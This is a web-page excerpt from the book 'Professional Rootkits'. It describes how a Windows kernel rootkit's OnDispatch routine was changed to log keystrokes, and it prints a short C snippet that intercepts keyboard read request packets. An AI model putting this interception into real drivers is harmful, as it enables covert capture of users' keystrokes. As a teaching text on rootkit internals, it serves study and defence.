IoManager.c


Only nine lines of OnDispatch within IoManager.c were modified for key logging. OnDispatch is where all I/O request packets are routed. The added lines simply ensure that a completion routine is added to all keyboard read requests:

  // Intercept I/O Request Packets to the keyboard  if( DeviceObject == newKeyboardDevice )  {          if( irpStack->MajorFunction == IRP_MJ_READ )          return OnKeyboardRead( DeviceObject, Irp, irpStack );          IoSkipCurrentIrpStackLocation ( Irp );          return IoCallDriver( oldKeyboardDevice, Irp );  } 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net